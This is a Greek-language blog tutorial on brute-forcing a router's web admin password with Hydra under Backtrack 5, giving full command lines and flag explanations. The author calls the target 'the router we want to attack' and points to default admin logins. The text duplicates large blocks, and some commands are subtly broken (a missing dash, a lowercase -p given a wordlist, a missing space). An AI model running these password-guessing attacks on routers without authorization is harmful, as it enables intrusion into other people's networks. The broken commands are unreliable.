Σε αυτό το tutorial θα παρουσιάσουμε ένα χρήσιμο εργαλείο για αυτούς που ασχολούνται με το θέμα "Pentesting". Η ονομασία του προγράμματος προέρχεται από την ελληνική μυθολογία και το όνομα αυτού είναι Hydra. Σύμφωνα λοιπόν με αυτό οι penetration testers μπορούν να ανακτήσουν κωδικούς από routers. Αυτό είναι και το θέμα που θα αναλυθεί στο σημερινό tutorial.
Πρώτα απ' όλα θα χρειαστούμε το Backtrack 5 και μια wordlist με πιθανούς κωδικούς. Το πρόγραμμα δουλεύει αντίστοιχα και σε windows και για την εκτέλεση του πρέπει να το τρέξουμε από το τερματικό των windows. Στη συνέχεια αφού εκκινήσουμε το backtrack ανοίγουμε ένα τερματικό και γράφουμε την παρακάτω εντολή:
hydra -L /root/router.lst -P /root/router.lst -e ns -t 1 -f -s -vV 192.168.1.254 http-get /192.168.1.254
όπου 192.168.1.254 η σελίδα του router που θέλουμε να επιτεθούμε.
Προσοχή σε εσάς μπορεί να διαφέρει η σελίδα έχοντας διαφορετική IP της μορφής:
192.168.1.1 ή 192.168.2.1 ή κάτι άλλο.
Επίσης σημαντικό είναι να έχετε τοποθετήσει την wordlist μέσα στον φάκελο root του backtrack που βρίσκεται στην επιφάνεια εργασίας του.
Πρώτα απ' όλα θα χρειαστούμε το Backtrack 5 και μια wordlist με πιθανούς κωδικούς. Το πρόγραμμα δουλεύει αντίστοιχα και σε windows και για την εκτέλεση του πρέπει να το τρέξουμε από το τερματικό των windows. Στη συνέχεια αφού εκκινήσουμε το backtrack ανοίγουμε ένα τερματικό και γράφουμε την παρακάτω εντολή:
hydra -L /root/router.lst -P /root/router.lst -e ns -t 1 -f -s -vV 192.168.1.254 http-get /192.168.1.254
όπου 192.168.1.254 η σελίδα του router που θέλουμε να επιτεθούμε.
Προσοχή σε εσάς μπορεί να διαφέρει η σελίδα έχοντας διαφορετική IP της μορφής:
192.168.1.1 ή 192.168.2.1 ή κάτι άλλο.
Επίσης σημαντικό είναι να έχετε τοποθετήσει την wordlist μέσα στον φάκελο root του backtrack που βρίσκεται στην επιφάνεια εργασίας του.
Και έτσι μπορείτε να προσπαθήσετε να κάνετε login. Δείτε και άλλες επιλογές/εντολές που μπορείτε να δώσετε στο Hydra:
-L=username (looks for a wordlist)
-l = username
-P = password (Looks for a wordlist)
-e ns = checks for 'null' password
-t xx= How many tasks to run at once
-f = exit once it finds the first user/password
-s = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.254 = IP address of router
http-get = what to crack/method etc
/ = Page to crack - root
οπότε πχ αν έχετε κάνει login στο router με όνομα χρήστη admin ή κάτι άλλο και άγνωστο κωδικό, η εντολή θα είναι της μορφής:
hydra -l admin -P /root/router.lst -t 1 -f -s -vV 192.168.1.254 http-get/192.168.1.254
Δηλαδή το βάζετε να ψάξει με το όνομα χρήστη admin και με την εντολή -P στην λίστα κωδικών για να βρεί τον κωδικό
Συνήθως ελάχιστοι χρήστες αλλάζουνε το login του ρουτερ τους οπότε δώστε αυτή την εντολή:
hydra -l admin -p /root/router.lst -e ns -t 1 -f -s vV 192.168.1.254 http-get /192.168.1.254
-L=username (looks for a wordlist)
-l = username
-P = password (Looks for a wordlist)
-e ns = checks for 'null' password
-t xx= How many tasks to run at once
-f = exit once it finds the first user/password
-s = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.254 = IP address of router
http-get = what to crack/method etc
/ = Page to crack - root
οπότε πχ αν έχετε κάνει login στο router με όνομα χρήστη admin ή κάτι άλλο και άγνωστο κωδικό, η εντολή θα είναι της μορφής:
hydra -l admin -P /root/router.lst -t 1 -f -s -vV 192.168.1.254 http-get/192.168.1.254
Δηλαδή το βάζετε να ψάξει με το όνομα χρήστη admin και με την εντολή -P στην λίστα κωδικών για να βρεί τον κωδικό
Συνήθως ελάχιστοι χρήστες αλλάζουνε το login του ρουτερ τους οπότε δώστε αυτή την εντολή:
hydra -l admin -p /root/router.lst -e ns -t 1 -f -s vV 192.168.1.254 http-get /192.168.1.254
Εδώ μπορείτε να δείτε από όλα τα routers τους εργοστασιακούς κωδικούς για login:
Αυτό ήταν τώρα αν είμαστε τυχεροί μπορούμε να πάρουμε πρόσβαση στο router.
ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.
0 σχόλια:
Δημοσίευση σχολίου
Σημείωση: Μόνο ένα μέλος αυτού του ιστολογίου μπορεί να αναρτήσει σχόλιο.